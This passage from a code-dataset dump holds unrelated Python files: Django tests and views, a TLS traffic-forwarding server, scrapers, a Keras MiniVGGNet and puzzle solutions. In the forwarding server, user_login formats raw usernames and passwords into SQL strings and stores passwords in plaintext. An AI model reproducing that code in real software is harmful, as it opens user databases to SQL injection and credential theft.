django.contrib.auth import 
get_user_model\nfrom django.urls import reverse\n\n\ndef create_test_user():\n args = dict(username='TEST_DUDE', email='me@here.com', password='secret')\n user = get_user_model().objects.filter(username='TEST_DUDE')\n if user:\n user = user[0]\n else:\n user = get_user_model().objects.create_user(**args)\n return user, args\n\n\nclass TestAccountsData(TestCase):\n\n def test_accounts(self):\n self.user, self.user_args = create_test_user()\n self.assertEqual(self.user.email, 'me@here.com')\n self.assertEqual(len(User.objects.all()), 1)\n\n def test_string(self):\n self.user, self.user_args = create_test_user()\n self.assertEqual(str(self.user), 'TEST_DUDE')\n\n\nclass TestAccountsViews(TestCase):\n\n def test_home_view(self):\n response = self.client.get('/accounts/')\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'theme.html')\n\n def test_login_view(self):\n response = self.client.get('/accounts/login')\n self.assertEqual(response.status_code, 301)\n self.assertEqual(response.url, '/accounts/login/')\n\n response = self.client.get('/accounts/login/')\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'theme.html')\n\n def test_logout_view(self):\n response = self.client.get('/accounts/logout/')\n self.assertEqual(response.status_code, 302)\n self.assertEqual(response.url, reverse('home'))\n\n def test_signup_view(self):\n response = self.client.get('/accounts/signup')\n self.assertEqual(response.status_code, 301)\n self.assertEqual(response.url, reverse('signup'))\n\n response = self.client.get(reverse('signup'))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'theme.html')\n\n\nclass TableTest(TestCase):\n\n def test_read_csv(self):\n table = read_csv_file('Documents/markseaman.info/Test/animals.csv')\n self.assertEqual(table, [['1', 'Dog'], ['2', 'Cat'], ['3', 'Bird'], ['4', 'Fish']])\n\n def test_write_csv(self):\n table = read_csv_file('Documents/markseaman.info/Test/animals.csv')\n self.assertEqual(table, [['1', 'Dog'], ['2', 'Cat'], ['3', 'Bird'], ['4', 'Fish']])\n write_csv_file('Documents/markseaman.info/Test/animals.csv', table)\n table = read_csv_file('Documents/markseaman.info/Test/animals.csv')\n self.assertEqual(table, [['1', 'Dog'], ['2', 'Cat'], ['3', 'Bird'], ['4', 'Fish']])\n","sub_path":"doc/tests_accounts.py","file_name":"tests_accounts.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"140954607","text":"import asyncio\nimport hashlib\nimport re\nimport os\nimport random\nimport json\nimport ssl\nimport sqlite3\nimport concurrent.futures\nfrom config.config import *\nfrom xmlrpc.server import SimpleXMLRPCServer\n\nuser_list = {} # 存储已连接上的用户\nserver_list = {}\nrules = []\n\n\ndef create_sqlite_db():\n con = sqlite3.connect(\"user.db\")\n cur = con.cursor()\n sql = \"CREATE TABLE IF NOT EXISTS user(id INTEGER PRIMARY KEY,username TEXT,password TEXT,email TEXT)\"\n cur.execute(sql)\n return con, cur\n\n\ndef transfer_json(msg, method):\n \"\"\"字符串与json格式互相转换\"\"\"\n if method:\n return json.dumps(msg)\n else:\n return json.loads(msg)\n\n\nasync def connect_dest_server(dest_addr, local_reader, local_writer, dest_reader, dest_writer):\n try:\n local_addr = local_writer.get_extra_info('peername') # 请求者的ip,port\n request_msg = {'local_addr': local_addr, 'request_addr': dest_addr, 'code': 'Request connection'} # 给客户端的请求连接信息\n request_msg = transfer_json(request_msg, method=True)\n 
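As an aside, the target end of this handshake (the peer behind dest_reader/dest_writer) would be a listening asyncio server that answers the 'Request connection' message; a minimal sketch under the same transfer_json message conventions, where the handler name and host/port are placeholders:

import asyncio
import json

async def handle_relay(reader, writer):
    # Hypothetical target-client handler: answer the relay's
    # 'Request connection' message with 'Accept connection'.
    request = json.loads((await reader.read(500)).decode())
    if request.get('code') == 'Request connection':
        reply = {'request_addr': request.get('request_addr'), 'code': 'Accept connection'}
        writer.write(json.dumps(reply).encode())
        await writer.drain()

async def serve(host='127.0.0.1', port=9000):  # placeholder address
    server = await asyncio.start_server(handle_relay, host, port)
    async with server:
        await server.serve_forever()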
# print('connection request sent to the target client: '+request_msg)\n\n        dest_writer.write(request_msg.encode())  # send the connection request to the target client\n        await dest_writer.drain()\n        try:\n            ensure_connection = await dest_reader.read(500)\n            ensure_connection = transfer_json(ensure_connection.decode(), method=False)\n\n            if ensure_connection['code'] == 'Accept connection':\n                try:\n                    connect_success = {'local_addr': local_addr, 'request_addr': dest_addr, 'code': 'Ready'}\n                    connect_success = transfer_json(connect_success, method=True)\n                    local_writer.write(connect_success.encode())\n                    await local_writer.drain()\n                    print('Request succeeded: ' + str(local_addr) + ' is now communicating with ' + str(dest_addr) + '...\\n')\n                    dest = {'addr': dest_addr, 'Reader': dest_reader, 'Writer': dest_writer}\n                    return dest\n                except ConnectionResetError:\n                    # print('User connection closed:', local_addr)\n                    return False\n                except Exception as e:\n                    print('0',e)\n            elif ensure_connection['code'] == 'Refuse connection':\n                try:\n                    connect_fail = {'local_addr': local_addr, 'request_addr': dest_addr, 'code': 'No'}\n                    connect_fail = transfer_json(connect_fail, method=True)\n                    local_writer.write(connect_fail.encode())\n                    await local_writer.drain()\n                    print('Request failed: ' + str(dest_addr) + ' refused to communicate with ' + str(local_addr) + '...\\n')\n                    dest_writer.close()\n                    local_writer.close()\n                    return False\n                except Exception as e:\n                    print('1',e)\n            else:\n                pass\n        except Exception as e:\n            print('2',e)\n            pass\n\n    except Exception as e:\n        print('3',e)\n        pass\n\n\ndef hold_user_info(ip, addr, reader, writer):\n    \"\"\"Store the details of a connected client\"\"\"\n    user = {'addr': addr, 'Reader': reader, 'Writer': writer}\n    user_list[ip] = user\n\n\ndef hold_server_info(ip, addr, reader, writer):\n    \"\"\"Store the details of a connected target server (client)\"\"\"\n    user = {'addr': addr, 'Reader': reader, 'Writer': writer}\n    server_list[ip] = user\n\n\nasync def server_authenticate(reader, writer, secret_key):\n    \"\"\"Verify that the client is legitimate\"\"\"\n    message = os.urandom(32)  # generate a random n=32 byte string\n    writer.write(message)\n    await writer.drain()\n    s = hashlib.sha512()\n    s.update(message + secret_key.encode('utf-8'))  # hash the challenge with the secret\n    digest = s.hexdigest()\n    response = await reader.read(1024)\n    if digest == response.decode('utf-8'):\n        client_addr = writer.get_extra_info('peername')\n        client_addr_str = str(client_addr[0]) + str(client_addr[1])  # concatenate ip and port\n        hold_user_info(client_addr_str, client_addr, reader, writer)\n        print('\\nClient ' + str(client_addr) + ' connected successfully\\n')\n        return digest\n    else:\n        writer.write('connection_error'.encode())  # if authentication fails, send an error message\n        writer.close()\n\n\nasync def user_login(reader, writer):\n\n    global search_result, account\n    try:\n        search_result = None\n        account = await reader.read(1024)\n        account = transfer_json(account.decode(), False)\n        sql = \"select * from user where username = '{}' and password = '{}'\".format(account['username'],\n                                                                                   account['password'])\n        cur.execute(sql)\n        search_result = cur.fetchall()\n    except sqlite3.OperationalError:\n        search_result = False\n    except ssl.SSLError:\n        search_result = False\n\n    if search_result:\n        print('\\nUser ' + account['username'] + ' logged in successfully!\\n')\n        writer.write('Login Success'.encode())\n        await writer.drain()\n        return True\n    else:\n        writer.write('Need Email'.encode())\n        await writer.drain()\n        email = await reader.read(1024)\n        verify_email = re.match(r'^[0-9a-zA-Z_]{0,19}@[0-9a-zA-Z]{1,13}\\.[com,cn,net]{1,3}(.cn)?$', email.decode())\n        if verify_email:\n            email = verify_email.group()\n            sql = \"insert into user(username,password,email) values ('{}','{}','{}')\".format(\n                str(account['username']), str(account['password']), str(email))\n            try:\n                cur.execute(sql)\n                con.commit()\n                print('\\nUser ' + account['username'] + ' registered successfully!\\n')\n                writer.write('Register Success'.encode())\n                await writer.drain()\n                return True\n            except Exception as e:\n                writer.write('Register Fail'.encode())\n                await writer.drain()\n                return False\n        else:\n            writer.write('Register Fail'.encode())\n            await writer.drain()\n            return False\n\n\ndef creat_server_ssl():\n    ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)\n    ssl_ctx.options |= ssl.OP_NO_TLSv1\n    ssl_ctx.options |= ssl.OP_NO_TLSv1_1\n    ssl_ctx.options |= ssl.OP_SINGLE_DH_USE\n    ssl_ctx.options |= ssl.OP_SINGLE_ECDH_USE\n    ssl_ctx.load_cert_chain(certfile='./server_ssl/mycertfile.pem', keyfile='./server_ssl/mykeyfile.pem')\n    ssl_ctx.load_verify_locations(cafile='./server_ssl/mycertfile.pem')\n    ssl_ctx.check_hostname = False\n    ssl_ctx.verify_mode = ssl.VerifyMode.CERT_REQUIRED\n    ssl_ctx.set_ciphers('ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384')\n    return ssl_ctx\n\n\ndef set_rule(rule_json):\n    global rule\n    rule = json.loads(rule_json)\n    rules.append(rule)\n    rpc_server.server_close()\n    return rule_json\n\n\ndef RPC_server(rpc_port):\n    global rpc_server\n    # port = 0\n    rpc_server = SimpleXMLRPCServer(('localhost', rpc_port))  # initialize the RPC server\n    rpc_server.register_function(set_rule, \"set_rule\")  # register the function\n    print(\"Waiting for RPC rule configuration......\")\n    try:\n        rpc_server.handle_request()  # block waiting for a call\n        print('Configuration finished......')\n    except OSError:\n        print('Configuration finished......')\n    return rule\n\n\nasync def handle_echo(reader, writer):\n    client_addr = writer.get_extra_info('peername')\n    connect_result = await server_authenticate(reader, writer, SECRET_KEY)  # verify the client is legitimate\n    if not connect_result:\n        print('Client ' + str(client_addr) + ' failed to connect')\n        writer.close()\n        return\n    try:\n        login_result = await user_login(reader, writer)\n        if not login_result:\n            user_list.pop(str(client_addr[0]) + str(client_addr[1]))\n            print('User connection closed:', client_addr)\n            writer.close()\n            return\n    except ConnectionResetError:\n        user_list.pop(str(client_addr[0]) + str(client_addr[1]))\n        print('User disconnected:', client_addr)\n        writer.close()\n        return\n    except ssl.SSLError as e:\n        return\n\n    rpc_port = random.randint(49995,50000)\n    # await asyncio.sleep(0.01)\n    rpc_port = 12039\n    # print(rpc_port)\n    writer.write(str(rpc_port).encode())\n    await writer.drain()\n\n    loop = asyncio.get_running_loop()\n    with concurrent.futures.ProcessPoolExecutor() as pool:\n        config_rule = await loop.run_in_executor(pool, RPC_server, rpc_port)\n    # config_rule = RPC_server()\n\n    ident, src_ip, src_port, dst_ip, dst_port = \\\n        config_rule['ident'], config_rule['src_ip'], config_rule['src_port'],config_rule['dst_ip'],config_rule['dst_port'],\n\n    # set the default destination server to connect to here\n    dst_ip = Client_Ip[0]\n    dst_port = Client_Port[0]\n    l_reader, l_writer = await asyncio.open_connection(dst_ip, dst_port)\n    server_addr = l_writer.get_extra_info('peername')\n    server_addr_str = str(server_addr[0]) + str(server_addr[1])\n    hold_server_info(server_addr_str, server_addr, l_reader, l_writer)  # store the request info for the target client (server)\n    # print(server_list)\n\n    try:\n        # dest_ip = await reader.read(100)  # first get the ip requested by the client\n        # dest_ip = dest_ip.decode()\n        dest_ip = server_addr  # default to connecting to server_addr here\n\n        print('Requesting: ' + str(client_addr) + ' target ip: ' + str(dest_ip))\n        find_dest = await connect_dest_server(dest_ip, reader, writer, l_reader, l_writer)\n\n        if find_dest:\n\n            config_rule['ident'] = 'hi'\n            config_rule_json = json.dumps(config_rule)\n            writer.write(config_rule_json.encode())\n            await writer.drain()\n            # print(config_rule)\n\n            s_reader = find_dest['Reader']\n            s_writer = find_dest['Writer']\n            while True:\n                data = await reader.read(100)\n                message = data.decode()\n                if message == 'Heart beat!':\n                    writer.write(message.encode())\n                    print('Heartbeat response ' + message)\n                    continue\n\n                if message == '' or message == 'exit':\n                    message = 'Disconnect Request'\n                    s_writer.write(message.encode())\n                    await s_writer.drain()\n\n                    re_msg = await s_reader.read(1024)\n                    if re_msg.decode() == 'ByeBye':\n                        writer.write(re_msg)\n                        await writer.drain()\n                        user_list.pop(str(client_addr[0]) + str(client_addr[1]))\n                        print('User disconnected:', client_addr)\n                        writer.close()\n                        s_writer.close()\n                        break\n                else:\n                    pass\n                s_writer.write(data)\n                await s_writer.drain()\n                print(str(client_addr) + ' is sending a message to ' + str(server_addr) + ': ' + data.decode())\n                try:\n                    re_msg = await s_reader.read(1024)\n                    print('Received reply from ' + str(server_addr) + ':\\n' + re_msg.decode())\n                    try:\n                        writer.write(re_msg)\n                        await writer.drain()\n                        print('Reply forwarded to ' + str(client_addr) + ':\\n' + re_msg.decode())\n                    except Exception as e:\n                        print('5',e)\n                except Exception as e:\n                    print('6',e)\n        else:\n            print(\"Request failed, the connection has been closed!\")\n    except ConnectionResetError:\n        message = 'Force Disconnect'\n        l_writer.write(message.encode())\n        await l_writer.drain()\n        l_writer.close()\n        # user_list.pop(str(client_addr[0]) + str(client_addr[1]))\n        print('User disconnected:', client_addr)\n        writer.close()\n\n    except ssl.SSLError as e:\n        pass\n\n\nasync def get_general_control():\n    reader, writer = await asyncio.open_connection(Operat_server_IP[0], Operat_server_Port[0])\n    while True:\n        cmd = await reader.read(100)\n        cmd = cmd.decode()\n        if cmd == '1' or cmd == 'find -all':\n            user_info = []\n            for user in user_list:\n                user_info.append(user_list[user]['addr'])\n            re_cmd = transfer_json(user_info, True)\n            writer.write(re_cmd.encode())\n            await writer.drain()\n        elif cmd == '2' or cmd == 'break -all':\n            for user in user_list:\n                try:\n                    user_writer = user_list[user]['Writer']\n                    user_writer.write('exit'.encode())\n                    await writer.drain()\n                    user_writer.close()\n                    print('User connection closed:', user_list[user]['addr'])\n                except Exception as e:\n                    print('7',e)\n            user_list.clear()\n            writer.write('-----All connections closed successfully-----'.encode())\n            await writer.drain()\n        else:\n            writer.write('-----Invalid command! Please retry-----'.encode())\n            await writer.drain()\n\n\nasync def main():\n    ssl_server = creat_server_ssl()\n    server = await asyncio.start_server(handle_echo, Server_Ip[0], Server_Port[0], ssl=ssl_server)\n    # server.socket returns a copy of the internal list of server sockets\n    addr = server.sockets[0].getsockname()\n    print('Server started successfully:', addr)\n    print('Waiting for client connections...\\n')\n\n    try:\n        await get_general_control()\n    except Exception as e:\n        print('8',e)\n\n    async with server:\n        # accept connections until the coroutine is cancelled; cancelling the serve_forever task shuts the server down\n        await server.serve_forever()\n\n\ndef open_agent_server():\n    asyncio.run(main())\n\n\ncon, cur = create_sqlite_db()\n\n\nif __name__ == '__main__':\n    open_agent_server()\n","sub_path":"8_1/traffic_forwarding/server/server/TCP_echo_server.py","file_name":"TCP_echo_server.py","file_ext":"py","file_size_in_byte":14043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"318700577","text":"\nlines = []\nwith open('3.txt', 'r', encoding = 'utf-8-sig') as f:\n\tfor line in f:\n\t\tlines.append(line.strip())\n\nfor line in lines:\n\ts = line.split(' ')\n\t# if s[0] = 13:34Allen, then s[0][:5] extracts part of the string => s[0][:5] = 13:34\n\t# s[0][2:4] = :3 , s[0][-2:] = en , s[0][:-2] = 13:34All , s[0][-5:-2] = All\n\t# a \"string\" can be treated like a \"list\"\n\ttime = s[0][:5]\n\tname = 
s[0][5:]\n\tprint(name)","sub_path":"r3.py","file_name":"r3.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"540825479","text":"import urllib\n\n \n\ndef clean(hur):\n\n ex = hur.find(\"<\")\n ass = ''\n lol = hur[ex:]\n ass = lol[:lol.find(\">\")+1]\n hur = hur.replace(ass, '')\n\n return hur\n\n \ndef n(the):\n ##Prereq Code\n ex = the.find(\"Prerequisite\")\n pre = ''\n lol = the[ex:]\n lol = lol.replace('\\n','')\n if (ex != -1 and len(the)!=0):\n pre = lol[:lol.find(\"
\")]\n\n ##Exclusion Code\n ex = the.find(\"Exclusion\")\n exs = ''\n lol = the[ex:]\n lol = lol.replace('\\n','')\n if (ex != -1 and len(the)!=0):\n exs = lol[:lol.find(\"
\")]\n\n ## Distibution\n ex = the.find(\"Distribution Requirement Status\")\n dis = ''\n lol = the[ex:]\n lol = lol.replace('\\n','')\n if (ex != -1 and len(the)!=0):\n dis = lol[:lol.find(\"
\")]\n\n ## Breadth\n ex = the.find(\"Breadth \")\n bre = ''\n lol = the[ex:]\n lol = lol.replace('\\n','')\n if (ex != -1 and len(the)!=0):\n bre = lol[:lol.find(\"
\")]\n\n ### Editing Prereq shit\n pre = pre.replace(\"\\r####\",'')\n exs = exs.replace(\"\\r####\",'')\n while pre.find('<')!=-1:\n pre = clean(pre)\n while exs.find('<')!=-1:\n exs = clean(exs)\n\n lol = []\n lol.append(pre)\n lol.append(exs)\n lol.append(dis)\n lol.append(bre)\n \n return lol\n\n\n\n\n\nurl = \"http://www.artsandscience.utoronto.ca/ofr/calendar/crs_csc.htm\"\nf = urllib.urlopen(url)\ncrc = (url[url.find(\"_\") + 1:url.rfind(\".\")]).upper() # Rip the course code from url and conver to upper case\n\n\ndef getProgramName(f):\n \n \n for i in range(0,23):\n x = f.readline()\n \n return(x[x.find(\">\") + 1 : x.rfind(\"<\")])\n\nprogramName = getProgramName(f)\n\nwhile (f.readline().find(programName + \" Courses\") == -1):\n f.readline()\ns = f.readline()\nattributes = []\ncourses = {}\nwhile (s):\n z = (s.find(crc) and s.find(\"\") and s.find(\"[\") and s.find(\"]\")) \n if (z!=-1): \n Title = ((s[:s.find(\"\")])[(s[:s.find(\"\")]).rfind(\">\")+1:\n (s[:s.find(\"\")]).rfind(\"]\") + 1]).replace(\" \",\"\")\n description = s[s.find(\"

\") + 3 : s.find(\"

\")]\n crcode = crc + str(Title[3:6])\n \n \n s = f.readline()\n z = (s.find(crc) and s.find(\"\") and s.find(\"[\") and s.find(\"]\")) \n x = ''\n while (not(z != - 1) and s!= \"\"): \n \n x = x + s +'####\\n'\n\n s = f.readline()\n z = (s.find(crc) and s.find(\"\") and s.find(\"[\") and s.find(\"]\")) \n courses[crcode] = [Title , description ,n(x)]\n else:\n s = f.readline()\n \n \n","sub_path":"uoft_coursecalendar_parser.py","file_name":"uoft_coursecalendar_parser.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"214150386","text":"import logging\nimport traceback\nimport Image\nimport ImageOps\nfrom pypes.component import Component\n\nlog = logging.getLogger(__name__)\n\nclass ImageMirror(Component):\n\n __metatype__ = 'TRANSFORMER'\n\n def __init__(self):\n Component.__init__(self)\n log.info('Component Initialized: %s' % self.__class__.__name__)\n\n def run(self):\n while True:\n\n # for each document waiting on our input port\n for doc in self.receive_all('in'):\n try:\n # grab the serialized image\n raw_image = doc.get('image_data')\n\n # grab the meta-data we need\n size = doc.get_meta('size', 'image_data')\n mode = doc.get_meta('mode', 'image_data')\n\n # deserialize the image content\n image = Image.fromstring(mode, size, raw_image)\n\n # perform the mirroring\n mirrored_image = ImageOps.mirror(image)\n\n # update the meta-data for the image\n doc.set_meta('size', mirrored_image.size, 'image_data')\n doc.set_meta('mode', mirrored_image.mode, 'image_data')\n\n # update the image_data with the new serialized payload\n doc.set('image_data', mirrored_image.tostring())\n\n except Exception as e:\n log.error('Component Failed: %s' % self.__class__.__name__)\n log.error('Reason: %s' % str(e)) \n log.debug(traceback.print_exc())\n\n # send the document to the next component\n self.send('out', doc)\n\n # yield the CPU, allowing another component to run\n self.yield_ctrl()\n\n","sub_path":"imagemirror/imagemirror/imagemirror.py","file_name":"imagemirror.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"509385385","text":"from queue import Queue\n\nclass Solution:\n def orangesRotting(self, grid: List[List[int]]) -> int:\n q = Queue()\n fresh = 0\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j]==2:\n q.put((i,j))\n elif grid[i][j]==1:\n fresh = fresh + 1\n dirs =[[-1,0],[1,0],[0,1],[0,-1]]\n time = 0\n if fresh == 0:\n return time\n while(q.empty()!=True):\n size = q.qsize()\n for l in range(size):\n r,c = q.get()\n for k in dirs:\n row = r + k[0]\n column = c + k[1]\n if((row>=0 and row=0 and column ReLU => BN => Conv => ReLU => BN => POOL => Dropout layer\n model.add(Conv2D(32, (3, 3), padding='same', activation='relu', input_shape=input_shape))\n model.add(BatchNormalization(axis=chan_dim))\n\n model.add(Conv2D(32, (3, 3), padding='same', activation='relu'))\n model.add(BatchNormalization(axis=chan_dim))\n\n model.add(MaxPooling2D(strides=(2, 2)))\n\n model.add(Dropout(rate=0.25))\n\n # second set Conv => ReLU => BN => Conv => ReLU => BN => POOL layer\n model.add(Conv2D(64, (3, 3), padding='same', activation='relu'))\n model.add(BatchNormalization(axis=chan_dim))\n\n model.add(Conv2D(64, (3, 3), padding='same', activation='relu'))\n model.add(BatchNormalization(axis=chan_dim))\n\n model.add(MaxPooling2D(strides=(2, 2)))\n\n model.add(Dropout(rate=0.25))\n\n # 
first set FC => ReLU => BN => Dropout\n model.add(Flatten())\n model.add(Dense(512, activation='relu'))\n model.add(BatchNormalization(axis=chan_dim))\n model.add(Dropout(0.5))\n\n # softmax classifier\n model.add(Dense(classes, activation='softmax'))\n\n return model","sub_path":"StarterBundle/practice/pyimagesearch/nn/conv/minivggnet.py","file_name":"minivggnet.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"571383076","text":"def same_checker(i, j, entire_list, animals):\n count = 0\n a1 = entire_list[animals[i]]\n a2 = entire_list[animals[j]]\n\n for k in range(len(a1)):\n if a1[k] in a2:\n count+=1\n return count\n \nentire_list = dict()\nanimals = []\n\nwith open(\"guess.in\" , \"r\") as fin:\n numb_ani = int(fin.readline().strip())\n \n for i in range(numb_ani):\n list_arr = []\n \n line = fin.readline().strip().split(\" \")\n numb_of_chars = int(line[1])\n \n for j in range(numb_of_chars):\n list_arr.append(line[2+j])\n entire_list[line[0]] = list_arr\n animals.append(line[0])\n \n largest = 0\n for i in range(numb_ani):\n for j in range(i+1, numb_ani):\n largest = max(largest, same_checker(i, j, entire_list, animals))\n \nwith open(\"guess.out\", \"w\") as fout:\n fout.write(str(largest+1))","sub_path":"jan_contest/prob_3/guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"53783367","text":"\"\"\"Coursitter URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path,include\nfrom app import views\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('login/', views.login_view),\n path('logout/',views.logout_view),\n path('', views.userMain),\n path('searchCourse/', views.searchCourseDeal),\n path('searchLabel/', views.seachLableDeal),\n path('allCourse/', views.allCourse),\n path('classADD/', views.addClassDeal),\n path('classDELETE/', views.deleteClassDeal),\n path('checkClass/', views.checkClassDeal),\n path('getHistory/', views.getHistory)\n]\n","sub_path":"Coursitter/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"270565891","text":"from django import forms\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.models import User\nfrom django.contrib.messages.storage import session\nfrom django.core.exceptions import PermissionDenied\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import redirect, render\nfrom django.urls import reverse_lazy\nfrom django.utils import timezone\nfrom django.views.generic import CreateView, DeleteView, ListView, UpdateView\nfrom rest_framework import generics, renderers, viewsets\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.response import Response\nfrom .forms import CardCreateForm, CardUpdateForm, SignUpForm\nfrom .models import Card\nfrom .serializers import CardSerializer, CardStatusSerializer\n\n\nclass SignUpView(CreateView):\n\n\n form_class = SignUpForm\n success_url = reverse_lazy('index')\n template_name = 'signup.html'\n\n def form_valid(self, form):\n valid = super(SignUpView, self).form_valid(form)\n username, password = form.cleaned_data.get('username'), form.cleaned_data.get('password1')\n new_user = authenticate(username=username, password=password)\n login(self.request, new_user)\n return valid\n\nclass CardCreateView(CreateView):\n\n\n model = Card\n success_url = '/'\n template_name = 'index.html'\n form_class = CardCreateForm\n\n def form_valid(self, form):\n\n card_name = form.cleaned_data.get('name')\n card_description = form.cleaned_data.get('description')\n card_assignee = form.cleaned_data.get('assignee')\n if card_assignee == None:\n Card.objects.create(name=card_name, description=card_description, creator=self.request.user)\n else:\n card_assignee = User.objects.get(username=form.cleaned_data.get('assignee'))\n Card.objects.create(name=card_name, description=card_description, creator=self.request.user, assignee=card_assignee)\n messages.success(self.request, f'The card \"{card_name}\" has been created and assigned to \"{card_assignee}\"!')\n return redirect('index')\n\nclass CardUpdateView(UpdateView):\n\n\n model = Card\n template_name = \"update.html\"\n success_url = '/'\n form_class = CardUpdateForm\n\n def get_form(self, form_class=None):\n\n self.object = self.get_object()\n if form_class is None:\n form_class = self.get_form_class()\n form = form_class(**self.get_form_kwargs())\n if (self.request.user.is_superuser == False) and (self.request.user != self.object.creator):\n form.fields['name'].widget.attrs['readonly'] = 'readonly'\n form.fields['name'].widget.attrs['disabled'] = 'disabled'\n form.fields['description'].widget.attrs['readonly'] = 'readonly'\n 
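(Aside on the pattern being applied here: the readonly/disabled widget attributes only change the rendered HTML, so a tampered POST can still alter the field. Django's Field.disabled flag enforces the restriction server-side as well. A standalone sketch, where LockedNoteForm and its fields are hypothetical and not this app's CardUpdateForm:)

from django import forms

class LockedNoteForm(forms.Form):
    # Hypothetical example fields.
    name = forms.CharField()
    description = forms.CharField(required=False)

    def __init__(self, *args, lock=False, **kwargs):
        super().__init__(*args, **kwargs)
        if lock:
            for field in self.fields.values():
                # Field.disabled renders the input disabled AND makes the
                # form ignore any submitted value, falling back to initial.
                field.disabled = True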
form.fields['description'].widget.attrs['disabled'] = 'disabled'\n form.fields['assignee'].widget.attrs['readonly'] = 'readonly'\n form.fields['assignee'].widget.attrs['disabled'] = 'disabled'\n\n return form\n\n def get_form_kwargs(self):\n\n kwargs = super(CardUpdateView, self).get_form_kwargs()\n\n if self.request.user.is_superuser == False:\n kwargs.update({'queryset': User.objects.filter(username=self.request.user)})\n else:\n kwargs.update({'queryset': User.objects.all()})\n return kwargs\n\n def get_context_data(self, **kwargs):\n context = {}\n if self.object:\n context['object'] = self.object\n context['card_creator'] = self.object.creator\n context_object_name = self.get_context_object_name(self.object)\n if context_object_name:\n context[context_object_name] = self.object\n context.update(kwargs)\n return super().get_context_data(**context)\n\n def post(self, request, *args, **kwargs):\n\n self.object = self.get_object()\n self.object.date_edited = timezone.now()\n self.object.save()\n\n if request.is_ajax():\n elm_id = request.POST['element_id']\n card_id = request.POST['card_id']\n user_object = request.POST['user_object']\n user = User.objects.get(username=user_object)\n card = Card.objects.get(id=card_id)\n if not user.is_superuser:\n if card.assignee == user:\n if elm_id != \"DN\":\n card.status = elm_id\n card.date_edited = timezone.now()\n card.save()\n else:\n messages.error(self.request, f'You are not permitted to move cards to Done column!')\n else:\n messages.error(self.request, f'You cannot move cards assigned to other users!')\n else:\n if (card.status == \"RD\" or card.status == \"DN\") and (elm_id == \"RD\" or elm_id == \"DN\"):\n card.status = elm_id\n card.date_edited = timezone.now()\n card.save()\n else:\n messages.error(self.request, f'You can move cards only between Ready or Done columns!')\n\n return super().post(request, *args, **kwargs)\n\nclass CardDeleteView(DeleteView):\n\n\n model = Card\n template_name = 'index.html'\n success_url = '/'\n\n def delete(self, request, *args, **kwargs):\n\n messages.success(self.request, f'The card \"{self.get_object().name}\" has been successfully deleted!')\n return super(CardDeleteView, self).delete(request, *args, **kwargs)\n\nclass IndexListView(ListView):\n\n\n model = Card\n template_name = 'index.html'\n\n def get_context_data(self, **kwargs):\n context = super(IndexListView, self).get_context_data(**kwargs)\n context['form'] = CardCreateForm(request=self.request)\n context['new_list'] = Card.objects.filter(status=\"NW\")\n context['in_progress_list'] = Card.objects.filter(status=\"INP\")\n context['in_qa_list'] = Card.objects.filter(status=\"INQ\")\n context['ready_list'] = Card.objects.filter(status=\"RD\")\n context['done_list'] = Card.objects.filter(status=\"DN\")\n context['users_list'] = User.objects.all()\n return context\n\nclass CardViewSet(viewsets.ModelViewSet):\n\n\n queryset = Card.objects.all()\n serializer_class = CardSerializer\n\nclass CardList(generics.ListAPIView):\n\n\n serializer_class = CardStatusSerializer\n\n def get_queryset(self):\n\n queryset = Card.objects.all()\n status = self.request.query_params.get('status', None)\n if status is not None:\n queryset = queryset.filter(status=status)\n return queryset\n","sub_path":"mainapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"324721046","text":"\"\"\"\n题目:给定一个只包括 '(',')','{','}','[',']' 
